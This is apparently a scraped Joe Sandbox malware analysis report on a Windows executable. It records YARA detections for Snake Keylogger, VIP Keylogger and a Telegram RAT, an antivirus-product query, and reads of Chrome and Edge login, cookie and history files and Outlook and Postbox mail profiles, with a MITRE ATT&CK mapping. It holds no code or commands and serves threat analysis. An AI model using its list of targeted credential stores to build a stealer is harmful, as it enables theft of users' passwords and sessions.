Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe

Code function: 0_2_0041E9D0 __vbaChkstk,__vbaOnError,#525,__vbaStrMove,__vbaLenBstr,__vbaStrToAnsi,GetUserNameA,__vbaStrToUnicode,__vbaFreeStr,#537,__vbaStrMove,__vbaInStr,#616,__vbaStrMove,__vbaFreeStr,__vbaFreeStr,__vbaErrorOverflow,

0_2_0041E9D0

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\at.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\at.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0000002E.00000002.2949149356.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2950015087.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 4852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 7924, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2941651605.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 4852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 7924, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\duencaj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\duencaj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\duencaj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\duencaj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\duencaj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\duencaj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\duencaj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\duencaj.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2950015087.000000000321B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2949149356.000000000286B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 4852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 7924, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000002E.00000002.2949149356.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2950015087.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 4852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 7924, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.duencaj.exe .3f0cd48.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.duencaj.exe .3f0cd48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.1828134469.00000000047B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1773144054.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2941651605.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.1828134469.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1773144054.0000000003D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 4852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 7924, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 Account Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	11 Windows Service	11 Windows Service	1 Deobfuscate/Decode Files or Information	111 Input Capture	1 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	1 Scheduled Task/Job	211 Process Injection	3 Obfuscated Files or Information	Security Account Manager	23 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	11 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	22 Software Packing	NTDS	121 Security Software Discovery	Distributed Component Object Model	111 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	231 Masquerading	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	211 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 20250301_173245__P20250301_173245__P.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
20250301_173245__P20250301_173245__P.exe